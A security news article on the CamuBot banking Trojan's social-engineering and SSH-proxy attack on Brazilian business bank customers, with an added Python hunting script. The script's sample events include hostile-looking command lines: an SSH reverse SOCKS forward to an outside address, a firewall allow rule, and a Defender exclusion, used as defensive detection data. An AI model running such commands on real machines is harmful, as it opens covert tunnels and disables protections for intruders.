David Bisson

David Bisson is an infosec news junkie and security journalist. He works as Senior Content Manager at Bora, Associate Editor for Tripwire's "The State of Security" blog, Contributing Editor for IBM's Security Intelligence, and Contributing Writer for Palo Alto Networks' Security Roundtable, Gemalto, Venafi, Zix Corp, AlienVault, Barkly and others.

Fraudsters Using New ‘CamuBot’ Malware to Steal Brazilian Banking Business Customers’ Credentials

Fraudsters are targeting business customers of several Brazilian banks with CamuBot malware in order to steal their account credentials.

In August 2018, researchers at IBM X-Force spotted some of the first attacks leveraging CamuBot to target business banking users in Brazil.

The attacks began with reconnaissance: the fraudsters first worked out which businesses banked with a target bank or financial institution. Because the campaign was confined to Brazil, IBM's researchers noted, that research could be done with nothing more than a phone book, a search engine or a professional social network.

Next, the attackers phoned employees who were likely to hold their employer's banking credentials. Posing as bank representatives, they directed the employees to visit a URL that would supposedly check whether the business had the bank's latest security module installed. The check, which the attackers controlled, reported that the module was missing, and the fraudsters then walked the employees through installing CamuBot as the supposed security module.

Limor Kessem, executive security advisor at IBM, emphasized that CamuBot stands apart from typical malware operations in Brazil. As she wrote in a blog post:

Very different from typical banking Trojans, CamuBot does not hide its deployment. On the contrary, it is very visible, using bank logos and overall brand imaging to appear like a security application. It thus gains victims’ trust and leads them to install it without realizing they are running an installation wizard for a Trojan horse.

Acknowledging this sophistication, Kessem noted that CamuBot is more advanced than other banking malware families that simply use fake overlay screens and instead resembles innovative threats like Dridex and TrickBot that combine social engineering and malware-based tactics.

Upon execution, CamuBot writes two files to the %ProgramData% folder that together set up a Secure Shell (SSH)-based SOCKS proxy on the machine, and it modifies firewall and antivirus rules so that its components are neither blocked nor flagged. With port forwarding configured, the operators can route their own traffic through that proxy, so their sessions with the bank originate from the infected machine and carry the victim's own IP address. That sidesteps fraud controls that key on an unfamiliar device or source address, which is the point of tunnelling through the victim rather than logging in directly.
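The three behaviours in that paragraph (an SSH client with forwarding options launched from a user-writable directory, a firewall allow rule for a program in such a directory, and an antivirus exclusion for it) are each noisy on their own but rare together on one host within a few minutes. The script below is an added example, not code from the article or from IBM's research: it runs a small set of hunting rules over constructed process-creation events in a made-up `timestamp|host|user|image|command_line` format and then correlates the hits per host. The host names, user, paths, ports and address are invented for the example; none of them are CamuBot indicators.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample telemetry in the style of process-creation events (Sysmon
# event 1 / Windows 4688), one per line: timestamp|host|user|image|command_line.
# Every line here is invented for this example; none is a CamuBot artefact.
SAMPLE_EVENTS = r"""
2018-08-14T10:02:11|WS-FIN-03|ACME\jsilva|C:\ProgramData\SecModule\ssh.exe|ssh.exe -N -R 9050 -p 443 svc@203.0.113.7
2018-08-14T10:02:13|WS-FIN-03|ACME\jsilva|C:\Windows\System32\netsh.exe|netsh advfirewall firewall add rule name="SecModule" dir=in action=allow program="C:\ProgramData\SecModule\ssh.exe"
2018-08-14T10:02:15|WS-FIN-03|ACME\jsilva|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Add-MpPreference -ExclusionPath C:\ProgramData\SecModule
2018-08-14T10:05:40|WS-FIN-03|ACME\jsilva|C:\Program Files\Git\usr\bin\ssh.exe|ssh.exe -T git@github.com
2018-08-14T10:07:02|WS-FIN-03|ACME\jsilva|C:\Windows\System32\notepad.exe|notepad.exe budget.txt
"""

SSH_CLIENTS = {"ssh.exe", "plink.exe"}
# -D <port> opens a local SOCKS proxy; a bare -R <port> (OpenSSH 7.6+) opens a
# SOCKS proxy on the SSH server whose connections exit through the client, i.e.
# through the victim's IP address; -R/-L with host:port are plain port forwards.
FORWARD_FLAG = re.compile(r"(?:^|\s)-[A-Za-z]*[DRL](?=\s|$)")
USER_WRITABLE = re.compile(r"(?i)\\(?:programdata|appdata|temp|users\\public)\\")
FIREWALL_ALLOW = re.compile(
    r'(?i)netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b.*\bprogram="?([^"\s]+)')
AV_EXCLUSION = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\s+(\S+)")


@dataclass
class Finding:
    when: datetime
    host: str
    rule: str
    severity: str
    detail: str


def parse_event(line):
    """Split one constructed event line into its five fields."""
    ts, host, user, image, cmd = line.split("|", 4)
    return datetime.fromisoformat(ts), host, user, image, cmd


def analyse(events_text):
    """Run the three single-event rules over every line and return the findings."""
    findings = []
    for raw in events_text.splitlines():
        if not raw.strip():
            continue
        when, host, _user, image, cmd = parse_event(raw)
        basename = image.rsplit("\\", 1)[-1].lower()
        # Rule 1: SSH client launched with a forwarding option. Severity depends on
        # where the binary lives; Git's bundled ssh.exe with -T is left at "low" or unflagged.
        if basename in SSH_CLIENTS and FORWARD_FLAG.search(cmd):
            sev = "high" if USER_WRITABLE.search(image) else "low"
            findings.append(Finding(when, host, "ssh_port_forwarding", sev, cmd))
        # Rule 2: inbound firewall allow rule for a program in a user-writable path.
        m = FIREWALL_ALLOW.search(cmd)
        if m:
            sev = "high" if USER_WRITABLE.search(m.group(1)) else "low"
            findings.append(Finding(when, host, "firewall_allow_rule", sev, m.group(1)))
        # Rule 3: Defender exclusion added for a user-writable path.
        m = AV_EXCLUSION.search(cmd)
        if m:
            sev = "high" if USER_WRITABLE.search(m.group(1)) else "medium"
            findings.append(Finding(when, host, "defender_exclusion", sev, m.group(1)))
    return findings


def correlate(findings, window=timedelta(minutes=10)):
    """Hosts where an SSH forwarding launch is joined, within `window`, by a firewall
    allow rule or an AV exclusion: the whole proxy-implant pattern, not one piece of it."""
    hits = set()
    for f in findings:
        if f.rule != "ssh_port_forwarding":
            continue
        for g in findings:
            if g.host == f.host and g.rule != f.rule and abs(g.when - f.when) <= window:
                hits.add(f.host)
    return sorted(hits)


if __name__ == "__main__":
    results = analyse(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.when} {f.host} {f.rule:22} {f.severity:6} {f.detail}")
    print("hosts matching the full pattern:", correlate(results))
```

On the sample data the Git-for-Windows `ssh.exe -T` launch and the notepad event produce nothing, the three events from the first few seconds each produce a high-severity finding, and `correlate()` reports the one host. Replace `SAMPLE_EVENTS` with an export from your own EDR or Sysmon pipeline in the same five-field layout to run it against real data.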

With the proxy in place, the final step of the attack is a pop-up that sends the victim to a phishing landing page imitating the target bank's login page. Once the victim, still on the phone with the supposed bank representative, has submitted the business's account credentials, the criminals hang up.

Security best practices such as multi-factor authentication make it harder for attackers to exploit a business's banking relationship in this way, but even these measures have their limits. IBM's X-Force researchers observed that, in some cases, CamuBot's operators asked the victim to install a driver for the authentication device attached to their machine and to enable remote sharing of that device. Doing so let the operators read the one-time passwords it generated and complete the login themselves.

These techniques highlight the importance of ongoing security awareness training. This type of education should include phishing simulations so that the entire workforce learns how to spot a suspicious email, link or unsolicited phone call.